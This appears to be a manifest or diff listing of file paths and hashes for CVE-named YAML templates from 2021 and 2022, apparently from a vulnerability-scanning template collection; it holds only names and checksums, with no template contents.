-http/cves/2021/CVE-2021-40859.yaml:4ed771797de7eb97612a8e188b1d63305514e203 -http/cves/2021/CVE-2021-40868.yaml:32371dc22f1287fe3a5c1b32074d733e27403650 -http/cves/2021/CVE-2021-40870.yaml:d50c8644722686501ee0cf0bf72e2f67fe624014 -http/cves/2021/CVE-2021-40875.yaml:5a8806c96b283f85c3e80ea54f820ae1df93166f -http/cves/2021/CVE-2021-40908.yaml:3b132f0a4bb3ca9edcd8648f1c4d8fadfae5b030 -http/cves/2021/CVE-2021-40960.yaml:ee0d9a9f71208eba9cd9614c40b18d7b73c72f83 -http/cves/2021/CVE-2021-40968.yaml:18c8c364d82ef5443c829c5c09cf82537c229bb5 -http/cves/2021/CVE-2021-40969.yaml:921cfca85fc500bb292d799a2f308f4d45509eab -http/cves/2021/CVE-2021-40970.yaml:21a3442c46f488ee8daab51321d8b319e8b95b9d -http/cves/2021/CVE-2021-40971.yaml:6d93fb1dc7caa662118aa510b3728d25d0633176 -http/cves/2021/CVE-2021-40972.yaml:7176ed8f122e9ba0cccad381a484f7c73fdce294 -http/cves/2021/CVE-2021-40973.yaml:2124e22228bfc310427d2087e5e3da4f85966474 -http/cves/2021/CVE-2021-40978.yaml:48d54d4669bc9153f0f509dc13758076dd243298 -http/cves/2021/CVE-2021-41174.yaml:ddb4fa2ef0e9ae56c71680b94a1ff0b06a18445b -http/cves/2021/CVE-2021-41192.yaml:0605dfe7517366ecb841fae6867d8c3f277296ec -http/cves/2021/CVE-2021-41266.yaml:d4af8b94cdf6482e4c2d0c37ec56a249bbbcb561 -http/cves/2021/CVE-2021-41277.yaml:99a0c1ee7c069a0291de1f8631a43a24a166ea32 -http/cves/2021/CVE-2021-41282.yaml:cf2e5c67efb4308af0841972254e1e008834e32f -http/cves/2021/CVE-2021-41291.yaml:04a080102925f31b01e782de23028082bdb0f74a -http/cves/2021/CVE-2021-41293.yaml:5db5b52f36f67ec99c64640839d7a434e30299f6 -http/cves/2021/CVE-2021-41349.yaml:f1d5aa432d7a9f4e47792bf736b357c434232993 -http/cves/2021/CVE-2021-41381.yaml:30e0bae3afa55a332329f7d0d367fc3cbe7424f6 -http/cves/2021/CVE-2021-41432.yaml:8f5974832a28e59b5457632a6881493b58fe795e -http/cves/2021/CVE-2021-41460.yaml:43d2f05c06c8ad7ba6dc28927197830e6ce24fcc -http/cves/2021/CVE-2021-41467.yaml:199e7323e203a52a7c441d1c055e070b26ca8782 -http/cves/2021/CVE-2021-41569.yaml:57e6615f4250f289b89543c945b888068333c2e2 -http/cves/2021/CVE-2021-41648.yaml:bc9c5bbc5c6850479f215112bad36c26c6d1a118 -http/cves/2021/CVE-2021-41649.yaml:cf231dc484366e9e787a2231d05c11a718e6069e -http/cves/2021/CVE-2021-41653.yaml:a7b9553eb67dfc4b985ceeea323e19ed1814b00c -http/cves/2021/CVE-2021-41691.yaml:f2eac3d65329ccd5e847cf02263433b4d951d9b7 -http/cves/2021/CVE-2021-41773.yaml:7bdd79878de066ee716bd7e4e0d90c97d388cf38 -http/cves/2021/CVE-2021-41826.yaml:b495b5f4f3d4587fec3a94a48f92d8feb55250ec -http/cves/2021/CVE-2021-41878.yaml:37696b4aa9d1b8243cb6fdb9892c32cc695ad0e4 -http/cves/2021/CVE-2021-4191.yaml:4fb7b8c3694c2d63a8a95be3ae6ad5174d719054 -http/cves/2021/CVE-2021-41951.yaml:32dc9fea1cced566b06d28f532616371ddd56cff -http/cves/2021/CVE-2021-42013.yaml:05b11f3520001c719762c39cf5a41e1af05bb48a -http/cves/2021/CVE-2021-42063.yaml:37db366fca382eb6bfa2c44ab7a2dcc192fece2d -http/cves/2021/CVE-2021-42071.yaml:35a7fa27368b5b57a0f0bb7615bf16e0d0750102 -http/cves/2021/CVE-2021-42192.yaml:44a3d2e550ff74e55a3b7a38eb8af28f0502bb88 -http/cves/2021/CVE-2021-42237.yaml:0213c73cf8c4be3086399350429bfc335ea2f840 -http/cves/2021/CVE-2021-42258.yaml:8c6c72b2652bae0811a44996ff9c72030341a461 -http/cves/2021/CVE-2021-42551.yaml:eddd6d97681c36454a0f8e7207bc94329f50ca48 -http/cves/2021/CVE-2021-42565.yaml:65b0dd1187c462a7420cfded7fa78e3af47a6b6d -http/cves/2021/CVE-2021-42566.yaml:ff4b24f0853fe3b5784ec5f7fb47d72dafea9f44 -http/cves/2021/CVE-2021-42567.yaml:4dfa0be892e120e3f56fb0570c627e78c2a2ed9d -http/cves/2021/CVE-2021-42627.yaml:609c797ba059f916c9ebfcb8bfed4aedbf51aba8 -http/cves/2021/CVE-2021-42663.yaml:c69dcada3c15eb8d11a8f35eaa96f0928b492f26 -http/cves/2021/CVE-2021-42667.yaml:e2693144983f0470a615cec60ec5b58319f73933 -http/cves/2021/CVE-2021-42887.yaml:74be5f7bd72fef7559355ddc4a8835e277b8a1ef -http/cves/2021/CVE-2021-43062.yaml:156a6db491b1bdcab6968a38208ce190f0f6c38b -http/cves/2021/CVE-2021-43287.yaml:8fd928279b4e8002c1b434223084313b17e9741a -http/cves/2021/CVE-2021-43421.yaml:8201a5d3170e2e9e320cb2375f12b25efef95486 -http/cves/2021/CVE-2021-43495.yaml:59cdb367cead5386c12c988b0503f0e813d6d570 -http/cves/2021/CVE-2021-43496.yaml:4163af8dd9ffffbd64d6f072e052d88f83a52b43 -http/cves/2021/CVE-2021-43510.yaml:79cdbff6687ca7f793d90c3c27447970a4944c48 -http/cves/2021/CVE-2021-43574.yaml:02640caa2158f81a55a083e05c70770d2f0383c7 -http/cves/2021/CVE-2021-43725.yaml:ed7acde4800d8892ec39a08e35354505b5032123 -http/cves/2021/CVE-2021-43734.yaml:e5344dbae5c6c770244b95387a9aae8544fb0d7f -http/cves/2021/CVE-2021-43778.yaml:7f4311d6da51935016a4d55d6ccd5eeb47b88bef -http/cves/2021/CVE-2021-43798.yaml:65aaad7b6cf326df333c1ffa5960e89cefc861a3 -http/cves/2021/CVE-2021-43810.yaml:63da8341ac08b890d5afd9bf5c62ccd0d6d4be89 -http/cves/2021/CVE-2021-44077.yaml:3a6d7d83a21b6df87f74109148e216dbd61dc098 -http/cves/2021/CVE-2021-44138.yaml:2c522e870bc1ed4b7264fd18e1565699954e6262 -http/cves/2021/CVE-2021-44139.yaml:91d1f46adebe349e1765735ecdf9b308d505f3a5 -http/cves/2021/CVE-2021-44152.yaml:7bf9809de29a8320e8341b1400a42511c7392aac -http/cves/2021/CVE-2021-44228.yaml:8e4f51942ce7b79632bfbdc2d0e397024ddd3ec1 -http/cves/2021/CVE-2021-44427.yaml:381a7460b2f138d985fb5a58c41581b53f01c62d -http/cves/2021/CVE-2021-44451.yaml:0659f75c0d773a59dfcfc02abe2dc0e4d0849d8e -http/cves/2021/CVE-2021-44515.yaml:95b960f94708fc68a60ca4ad5b5e38e1815a1605 -http/cves/2021/CVE-2021-44528.yaml:eaf494ed01e40e0c8d5067ed3370af939a940b55 -http/cves/2021/CVE-2021-44529.yaml:95f738d35c54ad445a6a18f507fc4d54aee98271 -http/cves/2021/CVE-2021-44848.yaml:f7c236e1538f318230e708b1323eb556412005e5 -http/cves/2021/CVE-2021-45043.yaml:c61fcf7085afca39ee86aeb6a209ae1b7c6999e6 -http/cves/2021/CVE-2021-45046.yaml:519dde92a2bfa30ac1105cbbc042db59e8af327d -http/cves/2021/CVE-2021-45092.yaml:828ab7fdd75d8539dfcbbc1344ca982fb920b6f9 -http/cves/2021/CVE-2021-45232.yaml:cdf20351a03b42acf559f5327b8da0eda51dca1e -http/cves/2021/CVE-2021-45380.yaml:72c28e9ba0b0dcf247e341aa48c867dd1219bfc1 -http/cves/2021/CVE-2021-45422.yaml:e78ab7a6881b87d5e2c256e175f714216bcba7cc -http/cves/2021/CVE-2021-45428.yaml:77082a4f66bb68b8d4e98f2a2ff35b88b4b81f73 -http/cves/2021/CVE-2021-45967.yaml:7a262a89e56e21eef8fd69c2ff64b2bfd25a6185 -http/cves/2021/CVE-2021-45968.yaml:7e7d827ddd58de23ae74a5e607f8a4137798d46d -http/cves/2021/CVE-2021-46005.yaml:bf7834b2e091548498fc397a983ed61edc686ab3 -http/cves/2021/CVE-2021-46068.yaml:75b13819c6e6f559c002e1aee709c18336cbb9ee -http/cves/2021/CVE-2021-46069.yaml:d39d3fa805baf3308d296cc30f97bfda5990d2a4 -http/cves/2021/CVE-2021-46071.yaml:965accf3a158ddeae5bbe969776bf557aeb5330b -http/cves/2021/CVE-2021-46072.yaml:1e5856c8733eac06ddb6de9b36cfe29506829c8b -http/cves/2021/CVE-2021-46073.yaml:04a539aecba9fca1c7f51f08be930b722dc3ecc2 -http/cves/2021/CVE-2021-46107.yaml:a1658d92714c11c9665ff45882cb7458bb5f4f8c -http/cves/2021/CVE-2021-46379.yaml:bb58f39fe80e3d4dd4b2a89e99f435c909878682 -http/cves/2021/CVE-2021-46381.yaml:0aa211cb8fdfc6be5cf03b776d7007f851d2a31f -http/cves/2021/CVE-2021-46387.yaml:53890ddf04f1b2863a0c0d97ca00decb710e0551 -http/cves/2021/CVE-2021-46417.yaml:ee5058908cbf1486587c3618c4ee206fb9b523cb -http/cves/2021/CVE-2021-46422.yaml:105e6e24cc8b472d640e4d872a5124fc36943d82 -http/cves/2021/CVE-2021-46424.yaml:a559a2b08b5e40a006d8d8af8cef6c181cdd1ee8 -http/cves/2021/CVE-2021-46704.yaml:a4073c534dafaaa7d6b854420e093b4c0a548a89 -http/cves/2022/CVE-2022-0140.yaml:cc46ad0de8e76728d747bf3a4c3b423be976ea61 -http/cves/2022/CVE-2022-0147.yaml:07f33c7f2c3eb0b0b58019a9fe207813a7b75c9b -http/cves/2022/CVE-2022-0148.yaml:645cf3b34c0a5a4dd68d4e87cff84632d55b650c -http/cves/2022/CVE-2022-0149.yaml:941f93d76ba2271e7bf0558099c3cff7e76537c9 -http/cves/2022/CVE-2022-0150.yaml:614bb85b232d1f9308925c1f8b7b240ec82825c3 -http/cves/2022/CVE-2022-0165.yaml:7dcc5ab8c87dcc165f62d94e2691baec5b135c22 -http/cves/2022/CVE-2022-0169.yaml:88761f0b16e75a6cc5fbcac6f06d42e301eec9ab -http/cves/2022/CVE-2022-0189.yaml:fecb80fd48d7ab52eaa5074fcaaec00b9ea9aae0 -http/cves/2022/CVE-2022-0201.yaml:dfdd7bbe3bd60aa37196161a0412dba0d0ef3a6a -http/cves/2022/CVE-2022-0206.yaml:8e11954873059cb5aeeb751b8826eb6ea80574b9 -http/cves/2022/CVE-2022-0208.yaml:e13f5fd83fe4929c5c199c6fc85ee8ea860c056b -http/cves/2022/CVE-2022-0212.yaml:9e8046a5e38d92daee80a8f7542c3ad674f244da -http/cves/2022/CVE-2022-0218.yaml:801bf3ea5ed4bc7ee943bbac0c6845e6ebb70485 -http/cves/2022/CVE-2022-0220.yaml:f4a469f2b7f9432148a7e03f8b08a5ce9521a771 -http/cves/2022/CVE-2022-0234.yaml:3fe423684b4010f92db9a283e3653745a5406687 -http/cves/2022/CVE-2022-0271.yaml:b3ae19c1f348421b912b846ed3abd3c86b8886db -http/cves/2022/CVE-2022-0281.yaml:6e77aee0fba0471142f1179d421187fe3abaf0b3 -http/cves/2022/CVE-2022-0288.yaml:e97af486bfb32153bc82cc57248e039d7c0ce1ec -http/cves/2022/CVE-2022-0346.yaml:dacfe3b292547a36c12e191beab325beb459f65f -http/cves/2022/CVE-2022-0349.yaml:57f1ae6f6fa0d9d0db97f1356741830fc839f46e -http/cves/2022/CVE-2022-0378.yaml:83fd86cd6160da3bea1c1abc60fe643d9a4fa784 -http/cves/2022/CVE-2022-0381.yaml:ffa0819ef6b74828e7f6ce63867d2ce17b577211 -http/cves/2022/CVE-2022-0412.yaml:30dc884998f380311b0c5de61d401db7fc9c2cc9 -http/cves/2022/CVE-2022-0415.yaml:185667ee98810819576fea9e9f2f8882be4071d5 -http/cves/2022/CVE-2022-0422.yaml:3469322798d58b3166f7aa97576758a7d7801104 -http/cves/2022/CVE-2022-0432.yaml:1557e7e3bf75b9eeb91796d0ced241f4ee75855b -http/cves/2022/CVE-2022-0434.yaml:762c2150d62997e90ef0d71482c05fde65d9580e -http/cves/2022/CVE-2022-0437.yaml:f8722fa6a55bee87fe4367bf9815516b8fa77882 -http/cves/2022/CVE-2022-0441.yaml:fe86eae2838e0740f54d5fb7e109ed88424f1af4 -http/cves/2022/CVE-2022-0482.yaml:37140b14e0e4967d70d3b57792d8a921064582fd -http/cves/2022/CVE-2022-0535.yaml:9d198f8d5bb52cd0ac37edeaeb308562adaebfde -http/cves/2022/CVE-2022-0540.yaml:34d9c99b9fb5a96c5dc113d2559d857996c4ee23 -http/cves/2022/CVE-2022-0591.yaml:cb99d16c32d2b21e7e7a1d0ab9e98ae0f0958d50 -http/cves/2022/CVE-2022-0594.yaml:275f880ff9653b479029619f045cf441adcc8746 -http/cves/2022/CVE-2022-0595.yaml:73265772d9c810ed637f4600f7c492771aeabbe7 -http/cves/2022/CVE-2022-0599.yaml:65f73416beb10f3de6c02cef7fef1eb24ac7e200 -http/cves/2022/CVE-2022-0653.yaml:eafb883b6359350d391b3a27d497c3cccc1f7f62 -http/cves/2022/CVE-2022-0656.yaml:631675b0d48718035ea7eb27fe84ff88ec68ebe8 -http/cves/2022/CVE-2022-0660.yaml:58c18fcea878af1e455934e5e0014ef126b618e1 -http/cves/2022/CVE-2022-0678.yaml:d06f598818290e9c93190102a6d423cfa1d53de9 -http/cves/2022/CVE-2022-0679.yaml:0aba00e4d431687f05ad2325fe207dbc30c1c700 -http/cves/2022/CVE-2022-0692.yaml:891770803e666b1ed5bfbb809d6f179d343990d7 -http/cves/2022/CVE-2022-0693.yaml:f54ad18422baab021e6481bae9e4ebadcddc5c72 -http/cves/2022/CVE-2022-0735.yaml:b7a63345670d4b80e0c6ab16f17429325caeef45 -http/cves/2022/CVE-2022-0747.yaml:4b7dabcc16adaacae53bd49543376c732f40fb4d -http/cves/2022/CVE-2022-0760.yaml:f8de9832599c6d0c873a0019df82e631bd77a88c -http/cves/2022/CVE-2022-0769.yaml:b319f7b76ed80b9c3c5553709714eae2b366f135 -http/cves/2022/CVE-2022-0773.yaml:08279b2f72b5a99caf1dcc24c1372b166dc75aaa -http/cves/2022/CVE-2022-0776.yaml:7c8ef61f3398b52680370d898d2506f8c083e3a2 -http/cves/2022/CVE-2022-0781.yaml:a0c5365a0ab05ef368d2002bf0bd25c970c6ffae -http/cves/2022/CVE-2022-0784.yaml:71ef22d01eb8a119c2e9f8efd7d6d05b96d661b8 -http/cves/2022/CVE-2022-0785.yaml:6f2cbf74d2b138dde54ff10d7b668b1873faef8e -http/cves/2022/CVE-2022-0786.yaml:fbaae5957500d54050894c3dd28d3e0a9a9baf3b -http/cves/2022/CVE-2022-0788.yaml:e83e5804fd672a33c96d50af4f2e1e5b16d45dba -http/cves/2022/CVE-2022-0817.yaml:f9ce422c143327ee2a64e40efa7d8a1be169dc07 -http/cves/2022/CVE-2022-0824.yaml:562ca18f50f74aa4be198fb631877a49636b3f55 -http/cves/2022/CVE-2022-0826.yaml:e8c3eb6fa088cd81cbf495dbea480730d164be55 -http/cves/2022/CVE-2022-0827.yaml:31f65bb0db0d25bb775b0ec9c8d156509ba79ea5 -http/cves/2022/CVE-2022-0846.yaml:9c6ca29ab073ba6f9315db6fc741f69c8fd3b4fc -http/cves/2022/CVE-2022-0864.yaml:b116d6bddac696542eb55e6f16d05b4cf4c5e5b9 -http/cves/2022/CVE-2022-0867.yaml:1632a8823af634b158bd117b5d9e6dd539757108 -http/cves/2022/CVE-2022-0869.yaml:45c812a97eb18035fd94236adaf36f6952816fc2 -http/cves/2022/CVE-2022-0870.yaml:b04212cc8a23926639390a74976be82c375085e8 -http/cves/2022/CVE-2022-0885.yaml:f23954f3cfd29bfda9f6fed98f03bd3ba5b928ce -http/cves/2022/CVE-2022-0928.yaml:1fa2fa89acacb3c813f3bb5596fa53cd7d68b5c7 -http/cves/2022/CVE-2022-0948.yaml:f5585a39d2b8ec3725a164693929dd794a41efdc -http/cves/2022/CVE-2022-0949.yaml:e387b858175da9909cd52fefb354fd87bdf6f8f9 -http/cves/2022/CVE-2022-0952.yaml:07b56b938b7df82c9ef0d0812eeb88bf046d3de7 -http/cves/2022/CVE-2022-0954.yaml:c4e2fee0856bafef9c908f78c5315cec167febce -http/cves/2022/CVE-2022-0963.yaml:a83c18c488b0b99514653329b645075f3f8b8b9a -http/cves/2022/CVE-2022-0968.yaml:7a66001266e14e3b1df6f3a715284a18f1c44905 -http/cves/2022/CVE-2022-1007.yaml:9f88416087efe0113af15a4bc6845ea16e2929f4 -http/cves/2022/CVE-2022-1013.yaml:6ae111ec04f2d8dc9f3dee6a5d6ee2480c502813 -http/cves/2022/CVE-2022-1020.yaml:6b8a4fd0b36e814008b234d705b5ce5bb96ea824 -http/cves/2022/CVE-2022-1040.yaml:a2274ceedb11e3906ebbe3aa8785f778e469f1ba -http/cves/2022/CVE-2022-1054.yaml:c3d80c88d596764077992ccbd3f9e97e6f534073 -http/cves/2022/CVE-2022-1057.yaml:99e510b58b3a27764dd6e5927b9d14f310238a33 -http/cves/2022/CVE-2022-1058.yaml:5417418cd1187cdd6b25e088521f21d692e61b45 -http/cves/2022/CVE-2022-1119.yaml:89cddfd270b24e5414e6740156da9480102c27a3 -http/cves/2022/CVE-2022-1162.yaml:4c745aaa022f82b18bfeddfd3749d1ef20a4890d -http/cves/2022/CVE-2022-1168.yaml:8c99bef47af5fd33d205a1f47ce4f98fe0744f50 -http/cves/2022/CVE-2022-1221.yaml:ee3698a590f585077cff97b1401c936a79b71b78 -http/cves/2022/CVE-2022-1329.yaml:7222fc07204c4db075bbd36418fee1752cdbbf7c -http/cves/2022/CVE-2022-1386.yaml:5e15636442efa4bae16f39486e464e32913d5a7d -http/cves/2022/CVE-2022-1388.yaml:94f1e18c6999928cf737a2a6fa29c80e57c7ee31 -http/cves/2022/CVE-2022-1390.yaml:1093d4c2d89bf98de91bce66b21d8607c67e9f47 -http/cves/2022/CVE-2022-1391.yaml:8e7df92b4354cb9762ac18add0da0ab7c911c46c -http/cves/2022/CVE-2022-1392.yaml:c2662a9cde1c952187f6ecdc5aab8d83169cdb2d -http/cves/2022/CVE-2022-1398.yaml:3a404bd6cfdc4cd28c07720ad02b9e078f38b64d -http/cves/2022/CVE-2022-1439.yaml:fda8648d8126c803bc8d4cd44e83134ab41db3df -http/cves/2022/CVE-2022-1442.yaml:65a350a020f0d5dd861c8f51d24849cf8a7207df -http/cves/2022/CVE-2022-1574.yaml:0c6235e9dbeb8d441c939cc2b80170a1ebb65d31 -http/cves/2022/CVE-2022-1595.yaml:810145a34dd431b2a4930541e2064f098caddec7 -http/cves/2022/CVE-2022-1597.yaml:7e43e049a2c74bbd242d0fd1dd2f0651b5cf6080 -http/cves/2022/CVE-2022-1598.yaml:a27e4af88fbe0c064884aad06dd27a436d8504ce -http/cves/2022/CVE-2022-1609.yaml:cb6f1bd6fc66e873c106dd59c98023d8ad16243f -http/cves/2022/CVE-2022-1713.yaml:5db1fc5383736deead6e866ef930d1e2ddc478d7 -http/cves/2022/CVE-2022-1724.yaml:bc5f3b4cf8394bb8c8e180b0f605fd2867a30c57 -http/cves/2022/CVE-2022-1756.yaml:909ea951e1e534d06f8577a4a9feffaa9633ff3b -http/cves/2022/CVE-2022-1768.yaml:881c0747211f44e3fa0b5723412fe8dea22f7391 -http/cves/2022/CVE-2022-1815.yaml:8ea0d069da47754b39751883125c96855b685f54 -http/cves/2022/CVE-2022-1883.yaml:eab9d12f16d3f77adec37da0cf02c502a6597007 -http/cves/2022/CVE-2022-1903.yaml:69087d2aeb72c44f13c13aa68e9ea209737c2651 -http/cves/2022/CVE-2022-1904.yaml:09008bd46d9ba255a617b2a66dc695e360605684 -http/cves/2022/CVE-2022-1906.yaml:c0b71e22411946550665a0619ca6c36a63231075 -http/cves/2022/CVE-2022-1910.yaml:51d1994c20dc0aa4694065a9634162f918d43dad -http/cves/2022/CVE-2022-1916.yaml:0b069a01736d8e296f6c03231b33d97ed814040e -http/cves/2022/CVE-2022-1933.yaml:f9d5f1054cd151818e29482e5ff081f7ef086b2f -http/cves/2022/CVE-2022-1937.yaml:6e2ebe2768efe2e86ea2e03097f147e134fcdc9e -http/cves/2022/CVE-2022-1946.yaml:e04a67c3ed6db6ec6e9eeffc8e3cda470647b255 -http/cves/2022/CVE-2022-1952.yaml:ca9fd4d46c24967dd6554f83ba2e3c266946a43c -http/cves/2022/CVE-2022-2034.yaml:6213a9331e4baa86b06687609e5f1b0c4fb18fe8 -http/cves/2022/CVE-2022-21371.yaml:838e998d636780fb9bf60710d77d5af72626c02a -http/cves/2022/CVE-2022-21500.yaml:7eb0540d82e15ca5ce1a7efc48709e544ee060f3 -http/cves/2022/CVE-2022-21587.yaml:069a3c686c7abfd2d7d647bb6c1f897a48efc20b -http/cves/2022/CVE-2022-21661.yaml:577fc02d5795f83a993bb4e6482dd82700126f2c -http/cves/2022/CVE-2022-21705.yaml:53bfd7db568e0d1362c4af5a8a7e6aa61d9eaa9c -http/cves/2022/CVE-2022-2185.yaml:4bf46c9a2d85a44d1f1c18dcf0bff87c9c9a83e7 -http/cves/2022/CVE-2022-2187.yaml:e10b24d910b3414453ed73ba04e35cdc828166b4 -http/cves/2022/CVE-2022-2219.yaml:9bf51ed9a003456f61039a169fdb0659fa70f921 -http/cves/2022/CVE-2022-22242.yaml:94d9f81160ac82e4ddcf26fb82e878646a22149b -http/cves/2022/CVE-2022-22536.yaml:48323ba99c43e3559cb76d72e5e5ae758d28820e -http/cves/2022/CVE-2022-22733.yaml:b3eff5f104d4e6cd641aab56d3012360f6e69129 -http/cves/2022/CVE-2022-22897.yaml:65dfd4390db25892256cf4ba209e42669fa027a0 -http/cves/2022/CVE-2022-2290.yaml:acded3ed2034d900dd6b62347b1d971d865a5a6b -http/cves/2022/CVE-2022-22947.yaml:a551f88f69550f1bfe13d791fac80c83e1ef2586 -http/cves/2022/CVE-2022-22954.yaml:ccafdd1768f90c0300d1adf4d8c28c3937173153 -http/cves/2022/CVE-2022-22963.yaml:f1fa0a249f42afd022006722a378ddd4bf2feafe -http/cves/2022/CVE-2022-22965.yaml:eb734940ca2fbf1a5dc6ae791e60dbcb47a92100 -http/cves/2022/CVE-2022-22972.yaml:9816e702eb3224f6dfe906b06be9c30dc637a02d -http/cves/2022/CVE-2022-23102.yaml:340ffa6e9f020955a36d2ac4990e3efe5430fd4a -http/cves/2022/CVE-2022-23131.yaml:b142d3f20274e757752c27fe0d443608a6c6dfd7 -http/cves/2022/CVE-2022-23134.yaml:71bff2d924886a85c2322c12e4212d86c5c76e92 -http/cves/2022/CVE-2022-2314.yaml:16285c0ba9ac51fa60a179847c798e6c3e95166e -http/cves/2022/CVE-2022-23178.yaml:a0e11e95655aea47789b0e75a8629196db97a4c4 -http/cves/2022/CVE-2022-23347.yaml:ee159a53f7d8df7d7a68560884c4d163ffd424c2 -http/cves/2022/CVE-2022-23348.yaml:d0b65db29bffd5f436a0626f4b2bca5b14e7a5cd -http/cves/2022/CVE-2022-23544.yaml:aa4239b78b89887683752babd12eee7ab99f7639 -http/cves/2022/CVE-2022-2373.yaml:10b9e293f0b9e8e6a4b969a7695b770e1f6b92f2 -http/cves/2022/CVE-2022-2376.yaml:7fa22848187ad7a4dec1df8099dff98ad5d19760 -http/cves/2022/CVE-2022-23779.yaml:908b42f9d1ca99b5a35b1836d2d0426f0323b54c -http/cves/2022/CVE-2022-2379.yaml:219036ac6d1f54b0aeaa4702762c6aeff64e74f0 -http/cves/2022/CVE-2022-23808.yaml:942a54a667b2ff5a0870e52a4c8ed059be0244f2 -http/cves/2022/CVE-2022-2383.yaml:3b08dc9938d2db696cd1eaec1a428605d4091f1c -http/cves/2022/CVE-2022-23854.yaml:9ba51cb33a25e83213f2b499552e46d54fc4156a -http/cves/2022/CVE-2022-23881.yaml:ca2ba23327ccaac43377d0f8f98e9ba50ba5f94d -http/cves/2022/CVE-2022-23898.yaml:c3d1aca3299b5978fe0db2026bb22ddb7b9423b4 -http/cves/2022/CVE-2022-23944.yaml:8c08e2b52f46a2bc3b625239b2106de67220367f -http/cves/2022/CVE-2022-24112.yaml:e6758ce0bd17ab5e775398e73833528defb4dff1 -http/cves/2022/CVE-2022-24124.yaml:8acc5c716bc13566edfa24f56e65990024d2b0e9 -http/cves/2022/CVE-2022-24129.yaml:5edb642adc522152b03dc0abaa77f3508d209c44 -http/cves/2022/CVE-2022-2414.yaml:0b465d2ed6553b774342726ac1713966efd4c728 -http/cves/2022/CVE-2022-24181.yaml:ecc6f680258b6b2884bc687d1a63622b2995f8b1 -http/cves/2022/CVE-2022-24223.yaml:242bf37850b69b968713d77052953490b687f31d -http/cves/2022/CVE-2022-24260.yaml:c859eb8c470c97c3f05f6141428de415859faf58 -http/cves/2022/CVE-2022-24264.yaml:4dc8e50a466ccc64165e08da70da05af371f62e7 -http/cves/2022/CVE-2022-24265.yaml:60686923812fec2aecd45b466e97681e73ef88e3 -http/cves/2022/CVE-2022-24266.yaml:0a719da6f6605a9f17d0f27a5cac071957d8651c -http/cves/2022/CVE-2022-24288.yaml:4f4982bbd58466c0963c000c9225c7bc4fe91e97 -http/cves/2022/CVE-2022-24384.yaml:a88509d75bdb2375f50d25c374d50eb7a67816f7 -http/cves/2022/CVE-2022-2462.yaml:d6e2c2fde474ee16c1dc8b490b6f8b5c8b80dbfd -http/cves/2022/CVE-2022-2467.yaml:bd55ea795abad6bf959437f5fd73251c0cb4c972 -http/cves/2022/CVE-2022-24681.yaml:3700d2975b74b0417542002fe3b6c8c2a1884be6 -http/cves/2022/CVE-2022-24716.yaml:2f131702fa8532021f931ae4ae2c692c575373e5 -http/cves/2022/CVE-2022-24816.yaml:3dce69981f54620c0800e6a7540f977f55aad60f -http/cves/2022/CVE-2022-24856.yaml:62f81e2b37b09e48f4d888b7bb9ff5294dbd9c16 -http/cves/2022/CVE-2022-2486.yaml:243b9cafc9017cd45b009fcff538696ac699544e -http/cves/2022/CVE-2022-2487.yaml:a3e0253b51ee172df5590b826b1d4ff86c90e3a3 -http/cves/2022/CVE-2022-2488.yaml:be4c122ec3080ef025ed453445fcae8171e00c0b -http/cves/2022/CVE-2022-24899.yaml:edbfe9fab0d695c80f907d51b9d8b4dabedf5580 -http/cves/2022/CVE-2022-24900.yaml:e7a67a9c54f54b690a18fb23856e0fe2a04c91aa -http/cves/2022/CVE-2022-24990.yaml:b4ba7fed826e963bf77573ed27a8518eb210ccbd -http/cves/2022/CVE-2022-25082.yaml:5b34ca9edd69a00dc682949c5da9afa436821f8a -http/cves/2022/CVE-2022-25125.yaml:fe728bfe489c433e0a662c8c8cf7c35cb220ffb6 -http/cves/2022/CVE-2022-25216.yaml:4380e49ffdc0c13289d1c05d594cdde39d81dab2 -http/cves/2022/CVE-2022-25323.yaml:e0f242630fa38e8565f318970336004ef21bd22a -http/cves/2022/CVE-2022-25356.yaml:c786dddc3693bd3e9bd4505b4ae357166180ccb1 -http/cves/2022/CVE-2022-25369.yaml:395d04f9dbc8abdd6af75398681e19d1f0c84834 -http/cves/2022/CVE-2022-2544.yaml:fd0e71f3d408e046de0738584a0054c41aa89ad4 -http/cves/2022/CVE-2022-2546.yaml:35b4724322cd1f2a8a2ab70bf78ac2f0d8e1a089 -http/cves/2022/CVE-2022-25481.yaml:191e383ad500b4442898f91ce55210b8864f5c2c -http/cves/2022/CVE-2022-25485.yaml:9c40e7b3215f5f77ef81b76429dc457a23b28bad -http/cves/2022/CVE-2022-25486.yaml:e1a2b6e1c21b69cb6a5d56218d57105e16b56342 -http/cves/2022/CVE-2022-25487.yaml:680ceab786876251b609cc1738be68f9a0d14723 -http/cves/2022/CVE-2022-25488.yaml:4c3dba7ec05ca295501dc4cfc2663fadf817574f -http/cves/2022/CVE-2022-25489.yaml:63a5061483b2909dc50f03f333bdb1ab8a9cfcd4 -http/cves/2022/CVE-2022-25497.yaml:f795731c032d02fbc7d2200376cd21f4a8e8547c -http/cves/2022/CVE-2022-2551.yaml:28b3f1ad2fdd203177f2dc045c1688190d9e88a7 -http/cves/2022/CVE-2022-2599.yaml:4c7e1e513aab8a183b58067a729365320760f439 -http/cves/2022/CVE-2022-26134.yaml:70a5c7e3c5e0c299ed75210fdb4c24ff16a64072 -http/cves/2022/CVE-2022-26138.yaml:96abcafe0f231bf51460fbf4c2e7b7d4e9aec879 -http/cves/2022/CVE-2022-26148.yaml:8c3553b81ca02b761e2020bed4b8f6619023999f -http/cves/2022/CVE-2022-26159.yaml:c535348fbfcc508123a0a925df06ff278a1f7cc0 -http/cves/2022/CVE-2022-26233.yaml:f533d8dd3f5a24f379804bc6d9fc86dde0f07b42 -http/cves/2022/CVE-2022-26263.yaml:080f3af1337536d5afab63159efbfb45b4529628 -http/cves/2022/CVE-2022-2627.yaml:3b4f2996fab85a916937478d6202c3f8ab88c77a -http/cves/2022/CVE-2022-2633.yaml:daf87635742ab3c0b72cbe08e9d9b307fb1a8add -http/cves/2022/CVE-2022-26352.yaml:87f3d94ab76702710f896823df9f2794a1e23ce7 -http/cves/2022/CVE-2022-26564.yaml:4dad03e9229d498bfd48c3adc64a4ea7353bad39 -http/cves/2022/CVE-2022-26833.yaml:47a66b6eb6ce6aea79ba42a9cc2fa2ea2f2e9951 -http/cves/2022/CVE-2022-26960.yaml:2aeda58dbd5ac0203fdd01c1ea77345080244cae -http/cves/2022/CVE-2022-2733.yaml:8181451f53dfa237b0e5353ac2c04a92a844bec8 -http/cves/2022/CVE-2022-2756.yaml:179a3b02c422b97650ec4bfc57ca0494201f7f35 -http/cves/2022/CVE-2022-27593.yaml:b4d04c051d8ff0cdd8c856b66e802efaf6982b58 